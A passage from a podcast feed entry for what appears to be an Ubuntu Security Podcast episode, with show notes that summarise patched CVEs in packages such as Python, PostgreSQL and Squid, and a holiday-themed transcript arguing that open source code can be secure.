  discussion of the security of open source code, plus we hint at what is in store
  for the podcast for 2023 and we cover some recent security updates including...
        
        ]]></itunes:subtitle>
        <itunes:summary>  For our final episode of 2022, Camila is back with a special holiday themed
  discussion of the security of open source code, plus we hint at what is in store
  for the podcast for 2023 and we cover some recent security updates including
  Python, PostgreSQL, Squid and more.
  </itunes:summary>
        <description>  For our final episode of 2022, Camila is back with a special holiday themed
  discussion of the security of open source code, plus we hint at what is in store
  for the podcast for 2023 and we cover some recent security updates including
  Python, PostgreSQL, Squid and more.
  </description>
        <googleplay:description>  For our final episode of 2022, Camila is back with a special holiday themed
  discussion of the security of open source code, plus we hint at what is in store
  for the podcast for 2023 and we cover some recent security updates including
  Python, PostgreSQL, Squid and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For our final episode of 2022, Camila is back with a special holiday themed
discussion of the security of open source code, plus we hint at what is in store
for the podcast for 2023 and we cover some recent security updates including
Python, PostgreSQL, Squid and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>54 unique CVEs addressed</p>
<h3 id="usn-5765-1-postgresql-vulnerability-00-55">[<a href="https://ubuntu.com/security/notices/USN-5765-1">USN-5765-1</a>] PostgreSQL vulnerability [00:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23222">CVE-2021-23222</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-138/#usn-5145-1-postgresql-vulnerabilities-06-08">[USN-5145-1] PostgreSQL vulnerabilities in Episode 138</a></li>
<li>Akin to STARTTLS vulns - could inject cleartext before a secure connection has
been established</li>
</ul>
<h3 id="usn-5766-1-heimdal-vulnerability-01-38">[<a href="https://ubuntu.com/security/notices/USN-5766-1">USN-5766-1</a>] Heimdal vulnerability [01:38]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41916">CVE-2022-41916</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer over-read of 1 byte with crafted certificate - crash</li>
</ul>
<h3 id="usn-5768-1-gnu-c-library-vulnerabilities-01-47">[<a href="https://ubuntu.com/security/notices/USN-5768-1">USN-5768-1</a>] GNU C Library vulnerabilities [01:47]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-12132">CVE-2017-12132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27618">CVE-2020-27618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25013">CVE-2019-25013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10228">CVE-2016-10228</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various possible crasher bugs in low-level utils that are not expected to run
on untrusted input</li>
</ul>
<h3 id="usn-5767-1-usn-5767-2-python-vulnerabilities-02-24">[<a href="https://ubuntu.com/security/notices/USN-5767-1">USN-5767-1</a>, <a href="https://ubuntu.com/security/notices/USN-5767-2">USN-5767-2</a>] Python vulnerabilities [02:24]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45061">CVE-2022-45061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37454">CVE-2022-37454</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45061">CVE-2022-45061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU based DoS when parsing IDNA (internationalised domain names in
applications - ie. unicode / bidirectional in your domain names) - used an
algorithm that was quadratic [O(n²)] - so if an attacker provided a really
long domain name that included crafted bidirectional unicode contents to be
parsed by the client, could cause the client to use lots of CPU resources to
parse this - this code was used by the socket and asyncio modules - and so
simply returning a <code>3xx</code> redirect header with a crafted Location could trigger
this bug</li>
<li>Possible integer overflow in SHA3 implementation - but python is memory safe -
true but this code was implemented in C</li>
</ul>
<h3 id="usn-5769-1-protobuf-vulnerabilities-03-56">[<a href="https://ubuntu.com/security/notices/USN-5769-1">USN-5769-1</a>] protobuf vulnerabilities [03:56]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1941">CVE-2022-1941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-5237">CVE-2015-5237</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5770-1-gcc-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5770-1">USN-5770-1</a>] GCC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-11671">CVE-2017-11671</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5771-1-squid-regression-04-05">[<a href="https://ubuntu.com/security/notices/USN-5771-1">USN-5771-1</a>] Squid regression [04:05]</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000027">CVE-2018-1000027</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000024">CVE-2018-1000024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-3948">CVE-2016-3948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2571">CVE-2016-2571</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2570">CVE-2016-2570</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2569">CVE-2016-2569</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Very old update to squid introduced a possible regression - initially thought
this was just a logging issue but turns out it was a real bug - an off-by-one
issue would mean squid would sometimes file to find items that were already
cached - only applies where the HTTP server is using the <code>Vary</code> header</li>
</ul>
<h3 id="usn-5772-1-qemu-vulnerabilities-05-18">[<a href="https://ubuntu.com/security/notices/USN-5772-1">USN-5772-1</a>] QEMU vulnerabilities [05:18]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3165">CVE-2022-3165</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2962">CVE-2022-2962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0216">CVE-2022-0216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3930">CVE-2021-3930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3750">CVE-2021-3750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3682">CVE-2021-3682</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various guest to host issues - allowing a guest to crash QEMU on the host</li>
</ul>
<h3 id="usn-5754-2-usn-5756-3-linux-kernel--azure--vulnerabilities-05-39">[<a href="https://ubuntu.com/security/notices/USN-5754-2">USN-5754-2</a>, <a href="https://ubuntu.com/security/notices/USN-5756-3">USN-5756-3</a>] Linux kernel (Azure) vulnerabilities [05:39]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.19 for 22.10, 5.4 for 20.04 LTS + 18.04 LTS</li>
<li>Most interesting is the high priority one we mentioned last week -
<a href="/episode-184/#usn-5754-1-linux-kernel-vulnerabilities-05-50">[USN-5754-1] Linux kernel
vulnerabilities</a> - Buffer overflow in NFSD</li>
</ul>
<h3 id="usn-5773-1-linux-kernel--oem--vulnerabilities-06-14">[<a href="https://ubuntu.com/security/notices/USN-5773-1">USN-5773-1</a>] Linux kernel (OEM) vulnerabilities [06:14]</h3>
<ul>
<li>10 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33743">CVE-2022-33743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.17</li>
<li>Essentially the same as above but also includes the anonymous VMA mapping vuln
from GPZ discussed in the last 2 episodes</li>
</ul>
<h3 id="usn-5774-1-linux-kernel--azure--vulnerabilities-06-59">[<a href="https://ubuntu.com/security/notices/USN-5774-1">USN-5774-1</a>] Linux kernel (Azure) vulnerabilities [06:59]</h3>
<ul>
<li>16 CVEs addressed in Trusty ESM (14.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3239">CVE-2022-3239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2153">CVE-2022-2153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15</li>
</ul>
<h3 id="usn-5775-1-vim-vulnerabilities-07-18">[<a href="https://ubuntu.com/security/notices/USN-5775-1">USN-5775-1</a>] Vim vulnerabilities [07:18]</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3591">CVE-2022-3591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3324">CVE-2022-3324</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3256">CVE-2022-3256</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3099">CVE-2022-3099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2581">CVE-2022-2581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2345">CVE-2022-2345</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Moar vim CVEs - none of these are high impact - all reported via their bug
bounty program, found via fuzzing</li>
</ul>
<h3 id="usn-5776-1-containerd-vulnerabilities-08-07">[<a href="https://ubuntu.com/security/notices/USN-5776-1">USN-5776-1</a>] containerd vulnerabilities [08:07]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24778">CVE-2022-24778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24769">CVE-2022-24769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31030">CVE-2022-31030</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23471">CVE-2022-23471</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5777-1-pillow-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5777-1">USN-5777-1</a>] Pillow vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45198">CVE-2022-45198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24303">CVE-2022-24303</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="camila-discusses-the-security-of-open-source-vs-proprietary-code-08-38">Camila discusses the security of open source vs proprietary code [08:38]</h3>
<h4 id="transcript">Transcript</h4>
<p>Hello listener! It has been a while since I last showed up here to share with
you some of my thoughts and spread the knowledge, and today I am back in order
to try to fix that, remove the void I have left in the hearts of those that
enjoy listening to me rambling about a certain cyber security topic. That being
said, I recorded my first podcast segment during the holiday season last year,
and I thought it would be very poetic to return at the same time this year to
record once again. Especially after I was struck with inspiration after spending
a little time with my family. Nothing more fitting for this once again holiday
episode, considering it is the time of the year - the most wonderful one - when
we usually enjoy mingling and celebrating with family and friends. The time of
the year where we meet in order to eat some good food, spend some quality time
together, catch up on life, share the joy&hellip; and answer the always asked
question by someone who knows you work with computers: &ldquo;Do you think it&rsquo;s a
virus?&rdquo;. &ldquo;Yes, uncle, it probably is, since the link you clicked on that said
&lsquo;Free 1000 dollar Christmas vouchers for the first 10 clicks&rsquo; is most likely a
scam. But hey, I gotta go now, because it is time for some delicious holiday
season desserts! Your computer can survive a few more hours doing some
cryptomining for some random hacker, so I&rsquo;ll check on that later for you&rdquo;.
Anyway, surprising as it may be, this actually was not the topic of conversation
that brought me here today, although I fully expect the previously mentioned
question to come my way whenever I do meet my family for the end of the year
festivities of 2022. Instead, I was asked a question that would probably have my
holiday treats wait for me a little bit longer, since it is one I find
compelling to answer, and one that I thought would be actually interesting to
share the answer to, so that you can take it to your holiday meetings as a hot
topic of conversation&hellip;you know&hellip;show off a little bit to the ones you love.</p>
<p>So&hellip;to elaborate a little bit more on my story and on this so far mysterious
question&hellip;while sipping on some delicious cocoa surrounded by some fairy lights
and the cold air - even though it is summer during the end of the year where I
live&hellip;I see you, southern hemisphere. I was traveling when this happened - my
dearest not-in-the-IT-field family member asked me the following question while
we had a conversation about my job: &ldquo;how is it possible to have security in a
software when the code for that software is available for all to see on the
Internet?&rdquo;. Running a prettify function on this question, we can word it as:
&ldquo;how can open source software be secure if the code is public?&rdquo;. And that,
family and friends, is the question that we wish to answer today. I already
answered my family member, but now, I want to do it the fancy way, the holiday
spirit way! So gather around with your drinks and delicious appetizers, and
before we head for dinner, and of course, dessert, let&rsquo;s think about the year we
leave behind, the code that was a part of it, and why, in the year of 2022, can
this code be secure when everyone knows exactly what it is.</p>
<p>Let&rsquo;s begin this beautiful holiday sharing moment by actually talking about what
is open source software and what is NOT open source software, as well as why one
would think that the former is less secure than the latter. To keep it simple:
open source software is the kind of software where the source code, a.k.a. the
instructions that will be transformed into the computer program that you will
later use, is publicly available for all to see. Those that wish to do so can
inspect this software&rsquo;s code to know exactly how it does what it does. They can
use it freely if following its license terms, and they can even modify it, maybe
change its functionalities, be it through creation of a copy of that code that
branches from the original version, or be it with authorization from the
creator/maintainer of the software to edit the original version wherever it is
being maintained. A beautiful example to bring this all together in your mind:
almost all software packages in Ubuntu are open source. The programs you run in
your Ubuntu OS come from code that is publicly available for all to access
through the loveliest Internet. For many packages, it is possible to choose one
from main or universe, for example, and find its code in a repository after a
quick web search. Even quicker: you can download the source code related to the
executables and libraries apt installs in your Ubuntu OS when you run &lsquo;apt-get
install &lt;insert-package-name-here&gt;&rsquo; by running &lsquo;apt-get source
&lt;insert-package-name-here&gt;&rsquo; instead. Please remember to replace
&lt;insert-package-name-here&gt; with the actual package name if you&rsquo;re gonna try to
do this. Anyway, this package you download with apt may have its code differ a
little bit from the original code for that software package, the one maintained
by its creator or any successors, also known as the upstream code, and that may
happen for various reasons, which I will not go too much further into here,
however, to put it directly: this code associated with the package will most
likely have its regular upstream maintainers, with a lot of them also accepting
contributions from people that might use this software, care about its wellbeing
or even&hellip;its security, and the source code in an Ubuntu package will be nothing
more than a copy of an upstream version that is being contributed to by the
Ubuntu teams and the Ubuntu community. Very much in the holiday spirit, one of
the ideas of open source is to have people collaborate on software, as well as
have software be shared with those that wish to use it, sometimes with changes.</p>
<p>Moving on&hellip;on the other side of our coin, we have non-open source software,
also known as closed source software, which is software for which the source
code is not publicly available for all to inspect, use or modify. Closed source
software has its source code protected, with only an authorized group of
people - who are usually a part of the organization that developed said software
or that is currently maintaining it after taking responsibility for it at a
certain point in time - having access to this source code, be it to change the
source code or to simply look at it and know what it is. Closed software is
usually not free to use and users that wish to have access to the software and
its functionalities will only be able to obtain a final executable version of
it, where it is very difficult to acquire information on the source&hellip;unless you
are very determined, but more on that later. For now, know that closed source
software will allow you to execute it, but you can&rsquo;t know what you are executing
unless you do some very intense digging. As for an example&hellip;let&rsquo;s put it this
way, so that you can fill in the blanks: if Ubuntu is a door and the doors are
open, then that must mean that the Windows are &hellip; . And there you have your
answer. I mean&hellip;it is the holiday season and we would rather have our guests
come in to celebrate through the door instead of any other way. And I say this
because I want you to understand that there is no right or wrong when it comes
to open source and closed source, there are only preferences and needs. There
are situations where one will be more useful than the other, or where one might
be preferred over the other. Who am I to judge if you let people into your house
through your window, or your chimney? What actually matters to us here is: why
is closed source usually considered something more secure &ldquo;intuitively&rdquo; when
open source can be just as, or arguably, even more secure? So, let&rsquo;s try to
answer that question, shall we?  When you think about wanting to protect
something, you think about keeping it hidden, keeping it a secret. Wait&hellip;this
is not nearly festive enough for a holiday episode. Let&rsquo;s try again. When you
don&rsquo;t want someone to guess what is going to be the surprise holiday dessert you
are serving by the end of dinner, you usually won&rsquo;t tell them anything about
it. You will hide the recipe, cook your dessert following that recipe, but only
allow your guests to know what it is and eat it once the time is just
right. After all, the holidays are all about each family&rsquo;s tradition, and I know
dessert eating schedules are definitely a part of it for many. Anyway, the point
here is&hellip;if no one knows what the dessert is and they don&rsquo;t have access to your
house while you cook it, bake it, prepare it in general, they cannot copy this
recipe to bring their own version of your dessert to your holiday celebration -
or any other holiday celebration, for that matter - and they can only speculate
on the ingredients once they eat it. And&hellip;since you kept your ingredients and
your cooking utensils far away from messy hands while you prepared your dessert,
no one can tamper with it, maybe steal a little bite before it is actually
complete, or even add a missing ingredient without authorization. You keep your
dessert &ldquo;safe&rdquo; by actually hiding it, allowing people access only when the final
product is complete. As much as I love holiday season analogies, let&rsquo;s put our
cyber security glasses back on and see this situation from the closed source
point of view: your recipe is your source code; you preparing the dessert is you
editing, building and compiling the code to create an executable program; and
this executable program is actually your final holiday dessert.</p>
<p>You&rsquo;re not sharing your source code, meaning people cannot tamper with it,
cannot create a bad copy of it and cannot inspect it in order to figure out
possible failures or ways to exploit it. Yes, even I have fallen victim to the
&ldquo;too much sugar&rdquo; mistake when baking stuff, but sometimes we can try to mask
mistakes with other ingredients and no one will ever know&hellip;This can also be
called security through obscurity, when you rely on secrecy and confidentiality
in order to avoid the exposure of weaknesses and the direct targeting that may
befall your software. How can a hacker actually exploit my code if they don&rsquo;t
know what the code is? That is the idea behind security through obscurity. I
will not get into the details of whether security through obscurity is an
effective practice or not, because that is a very intense and polarizing
subject, and it is the holiday season&hellip;let&rsquo;s leave the heated discussions for
some other time. I will say, however, that it directly clashes with the open
source premise, and it is one of the reasons that may be behind the choice of
making software closed source. However, even though this might be a way to
protect your software from exploitation and from vulnerability discovery, it is
not a fool proof technique to avoid the really determined from figuring out what
they want when they are trying to hack you. Talking once more about desserts,
because they are delicious and a very pleasing analogy to consider&hellip;if you
have, for example, a friend or family member that is a chef. They go to your
holiday dinner party and then eat your dessert, which we will consider here as
being a beautiful multilayered trifle. They eat your trifle and because they are
so experienced in the art of cooking, they are able to tell all of the
ingredients you have in your cream after tasting it. It is not a skill everyone
possesses - discovering the trifle recipe is no trifle matter&hellip;one might say -
and it is not something everyone will be looking forward to do&hellip;after all, some
of us simply want to eat and enjoy the food, be the ingredients what they
may. However, there might just be that someone that is willing and capable to go
the extra mile to figure out your recipe&hellip;and let me tell you the bad
news&hellip;there is not much you can do about it, because there is not much you can
hide about your dessert if you intend to serve it for people to eat.</p>
<p>The same goes for code. Yes, it is possible to not share the source code of your
software, but for a computer to run a software, it needs to follow the
instructions that were transformed into the executable program that originated
from the source code. So even if the executable does not contain the exact
source code, it will contain something that can be extracted and analyzed by the
brave and patient. Any program out there can be reverse engineered into its low
level code version, and this low level code, mainly created to be machine
readable code, when analyzed, will tell you more about what the source code
could actually be. You are able to get from the final product to the actual
recipe that led you to that product&hellip;even if the low level code will be very
difficult to analyze and piece together in order to form something similar to
what would be the original source code that generated it. But doubt not my
friend&hellip;there are people out there that are willing to do this, and sometimes
these people can be really, really good at it. So that is why security through
obscurity can help, as it is one more barrier that a hacker needs to cross in
order to be able to possibly tamper with a system, however, it is not an
impenetrable one, and it will only stop those lazy enough to cross it&hellip;or those
that maybe ate too much during dinner already and will pass on dessert.</p>
<p>Aah, holiday season food is delicious, isn&rsquo;t it? Plus, I&rsquo;m not the type to pass
on dessert, and I am definitely not done talking about them, the holiday spirit
and how it all relates to open source code quite yet, so let&rsquo;s keep going. Hold
on to that dessert analogy, because we will bring it back shortly. For now, we
move on, understanding one reason why it might seem that closed source is safer
or more secure than open source. Especially when you think about one of the main
activities performed by the Ubuntu Security team, which is applying patches to
vulnerabilities that are constantly being found in the source code of packages
that can be installed in Ubuntu, or that are found in the core of Ubuntu, the
kernel.  Throughout all the seasons, including the holiday season, we fix issues
that are being found by people from the community that look into and identify
flaws in these packages, sometimes even unintentionally. We can see this as
people finding problems with our recipe and pointing them out to us, forcing us
to change it so that the end result will be something better, something that all
can enjoy. &ldquo;Hey, you have peanuts here, what about the people who have peanut
allergies that will eat this?&rdquo;&hellip;or&hellip;&ldquo;Hey, if this is cooked in the southern
hemisphere, where it is hot during the holiday season instead of cold, this rest
time for the cream might be too much and it will be too much of a liquid by the
time you want to put your trifle in its final container&rdquo;. And while you listen
to all these complaints and look at your recipe book, you might think it is all
very annoying&hellip;having to change your recipe to fix all these problems&hellip;but
when you actually think about it&hellip;is it not helpful instead? I mean&hellip;you don&rsquo;t
wanna kill grandma because you forgot she was allergic to peanuts, do you? Had
you not made your recipe public, you might have not discovered that you had to
change it&hellip;the bad way: by having grandma spit that trifle all over the floor
and scold you because grandma might fall for phishing scams from time to time,
but she knows better than to eat hidden peanuts in your trifle. Also&hellip;this is a
podcast with positive vibes, so let&rsquo;s not actually consider the worst of the
worst situation here for grandma and for you as well&hellip; but you get the point.</p>
<p>Do not kid yourself by thinking that closed source software has less bugs than
open source software. They might be encountered at a smaller rate, since
analysis of the source code is something harder to do and can only be done by
people with access to the code, however, they are there&hellip;and sometimes, people
figure this out in the worst way possible: when they have already been
hacked. And then it is a race to figure out where the bug that caused the issue
is, so that it can be fixed. By making the source code public, people that are
willing to help and are willing to make this code better, safer and more robust
have the chance to actively participate in its development and improve the
overall final product. One of the reasons why open source software came to be
was exactly to provide users with more security, since it is easier to find
hidden problems in that which has a lot of people auditing AND it is also easier
to trust that which you can audit. Imagine if your prankster cousin wants to
tamper with your dessert, and they add an extra bad ingredient to the recipe
without your knowledge after you leave them a while with your recipe
book&hellip;after all, you also need to prepare your holiday dinner. Anyway, if you
had decided to hide your dessert recipe from everyone, people would only know
something was incredibly wrong once they would have eaten it. Of course, if you
were hiding it from everyone, you would have also hidden it from your prankster
cousin and not shown them the recipe in the first place, but they could have
just as easily found another way to get to it, and if they did a good job
changing the recipe without your knowledge, you might not even know it had been
tampered with at all. Shoutout to a well known comedy series in which someone
adds some savory food to what is supposed to be a dessert trifle because they
thought that was the correct recipe, when it was actually all a
misunderstanding. The ones who know, will know… Of course, when you hide your
recipe book well enough, it is not expected that the recipe will be tampered
with, but sometimes, you yourself are the one doing the tampering&hellip;you holiday
prankster, you! You want to play a prank on your friends and family during the
holidays and decide to add something weird to your dessert. If your recipe is
public, however, people are able to check for mistakes, and if they see
something that might be a problem to them, they can tell you so that you can fix
it, or they can choose to not eat your dessert if you don&rsquo;t want to act on your
apparent mistake. Sure, if you make your recipe public maybe you don&rsquo;t get to do
the prank - which is actually not really nice on your part, considering that you
are hosting a holiday party to entertain people you love and care about - but if
you don&rsquo;t make it public, there might be people who just won&rsquo;t eat your dessert
out of lack of trust in you.</p>
<p>When we talk about source code, we have the same. Being able to check the source
code for a program you wish to use will allow you to check if the source code is
doing something you don&rsquo;t see as being secure, or if it is behaving insecurely
due to a bug. You can even create your own copy of the source with the changes
you find are necessary in order to get to use the software in a way you find
acceptable! However, since the code is public and a lot of people end up using
it, a community usually builds around it and there are always the ones looking
to improve code, fix its bugs, and make it more secure overall, so maybe you
won&rsquo;t even need your own edited copy of the source code, since you can just
share your concerns with that community and the issue might be addressed
directly in the upstream version of the code. Of course this all depends if the
software you are considering has an active upstream and is being properly
maintained&hellip;that is unfortunately a downside to free and open source software:
not all code out there is being properly taken care of&hellip;not everyone has the
holiday spirit and wants to improve on their dessert recipes. They write it once
and just make it available to whoever wants to cook it without any extra
additions or mistake corrections. However, fear not, because at least when we
are talking about security, information regarding vulnerabilities found in open
source code is mostly shared publicly, and, since it is possible to have your
own copy of the code to edit, people who have these copies can also edit their
own versions to fix issues that were found by other people, be it with their own
fixes be it with fixes provided by the upstream developers that maintain the
software (when they exist)&hellip;as we do with Ubuntu packages!  So as you can see,
open source truly encompasses the holiday spirit, by allowing people to share
and by allowing software to improve under the suggestions of many people. The
open source community being a group of friends sitting together to share that
holiday dinner, find possible issues and solve them so that next year said
dinner can be even more delicious&hellip;and maybe even have some extra desserts!</p>
<p>So there you have it, the reason why you don&rsquo;t need to worry about open source
being insecure just because the source code is public. Sure, there is a risk
involved with having your code be public, but I had a teacher that once taught
me that sometimes it is not about hiding the algorithm, but instead about making
it that the algorithm is so well structured that it doesn&rsquo;t matter that said
algorithm is public, since there is simply no way to exploit it. The basic
example are the cryptographic algorithms out there that we use to encrypt our
data: the algorithms are public, since we need a standard and people need to
know how things work in order to implement the standard and use it in their
applications, however, it doesn&rsquo;t matter that they are public and that people
know the steps necessary to encrypt or decrypt some plain text, because what
matters is that if there is no key, breaking the encryption is simply not
achievable in our average lifespan with the average resources. The power of the
algorithm is in the way it works, the math and the theory that support it, and
not in its visibility. Everyone can look at the algorithm, and its security
stands strong. So without that key, breaking encryption is nearly
impossible. When writing open source code, the idea is to follow this same
premise: write good code, in such a way that it doesn&rsquo;t matter that it is
public, because even if it is, it is not exploitable since you programmed it
with security in mind. So no&hellip;please don&rsquo;t hardcode passwords into your open
source code. That is not secure practice, and that is not open source being
secure. Don&rsquo;t do it in your closed source code&hellip;because this is not closed
source being secure also!</p>
